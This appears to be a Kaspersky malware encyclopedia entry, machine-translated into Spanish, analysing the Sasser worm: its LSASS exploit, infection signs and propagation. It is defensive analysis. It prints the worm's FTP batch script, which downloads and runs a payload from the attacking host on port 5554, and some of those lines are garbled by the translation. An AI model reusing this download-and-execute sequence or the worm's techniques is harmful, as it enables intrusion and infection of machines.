ESTE SERVICIO PUEDE CONTENER TRADUCCIONES DE GOOGLE. GOOGLE NIEGA CUALQUIER RESPONSABILIDAD RELACIONADA CON LAS TRADUCCIONES, EXPRESA O IMPLÍCITA, INCLUYENDO CUALQUIER RESPONSABILIDAD ACERCA DE LA PRECISIÓN, LA CONFIABILIDAD Y CUALQUIER RESPONSABILIDAD IMPLÍCITA DE COMERCIABILIDAD, IDONEIDAD PARA UN PROPÓSITO EN PARTICULAR Y DE NO INFRACCIÓN.

Por su comodidad, se ha traducido el sitio web de Kaspersky Lab utilizando un software de traducción de Google Translate. Se hicieron unos esfuerzos razonables para proporcionar una traducción precisa; no obstante, las traducciones automáticas no son perfectas y no hay ninguna intención de sustituir el trabajo de los traductores. Se proporcionan estas traducciones como un servicio para los usuarios del sitio web de Kaspersky Lab y se han publicado tal "como es". No hay ninguna garantía, expresa o implícita, acerca de la precisión, la confiabilidad o exactitud de cualquier traducción desde el inglés a cualquier otro idioma. La traducción de algunos contenidos (imágenes, videos, Flash, etc) podrían no ser totalmente fiel debido a las limitaciones del software de traducción.

Net-Worm.Win32.Sasser

Fecha de detección 05/13/2004
Clase Net-Worm
Plataforma Win32
Descripción

Sasser es un gusano de Internet que explota la vulnerabilidad MSASS LSASS descrita en el boletín de seguridad de Microsoft MS04-011 .

Microsoft lanzó un parche para esta vulnerabilidad el 13 de abril de 2004, mientras que Sasser.a se detectó por primera vez el 30 de abril de 2004.

Sasser opera de manera muy similar a Lovesan, excepto que Lovesan explotó una vulnerabilidad en el servicio DCOM de PRC, no en el servicio LSASS.

Sasser afecta a las computadoras que ejecutan Windows 2000, Windows XP, Windows Server 2003. Sasser funciona en todas las otras versiones de Windows pero no puede infectarlas atacando a través de la vulnerabilidad.

Sasser está escrito en C / C ++, utilizando el compilador de Visual C. El gusano pesa alrededor de 15 KL y está empacado por PECompact2.

Signos de infección

  • el archivo 'avserve.exe' en el directorio de Windows.
  • Un mensaje de error acerca de la falla del servicio LSASS que generalmente también hace que el sistema se reinicie.

Propagación

Después del lanzamiento, Sasser se copia en el directorio raíz de Windows con el nombre avserve.exe y registra este archivo en la clave de ejecución automática del registro del sistema:

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "% WINDIR% avserve.exe" 

Sasser crea un identificador único 'Jobaka31' en la RAM para localizar copias de sí mismo en caso de futuros intentos de infección.

Sasser lanza un servidor FTP en el puerto TCP 5554 y luego inicia 128 rutinas de propagación. Durante este proceso, el gusano intenta iniciar el proceso AbortSystemShutdown para prohibir el reinicio del sistema.

Sasser inicia un escaneo de direcciones IP para identificar las direcciones de las víctimas y envía una solicitud al puerto TCP 445. Si alguna máquina responde, Sasser explota la vulnerabilidad LSASS para lanzar un shell de comando 'cmd.exe' en el puerto TCP 9996. Finalmente Sasser, ordena a la máquina infectada que descargue y ejecute el componente principal del gusano con el nombre "N_up.exe", donde "N" es un número aleatorio:

 echo apagado



echo open [dirección de la máquina atacante] 5554 >> cmd.ftp



echo anonymous >> cmd.ftp



usuario de eco



echo bin >> cmd.ftp



echo get [random number] _up.exe >> cmd.ftp



echo bye >> cmd.ftp



echo en



ftp -s: cmd.ftp



[número aleatorio] _up.exe



echo apagado



del cmd.ftp



echo en 

Como resultado, una máquina puede ser atacada más de una vez y contener múltiples copias del gusano con nombres de muestra tales como:

 23101_up.exe



5409_up.exe 

Etcétera.

Otro

Después de la infección, la máquina víctima genera un mensaje de error sobre un servicio LSASS que falla, con lo cual puede intentar reiniciarse.

Sasser crea el archivo 'win.log' en el directorio raíz de la unidad C donde el gusano registra las direcciones IP de todas las máquinas atacadas.


Enlace al original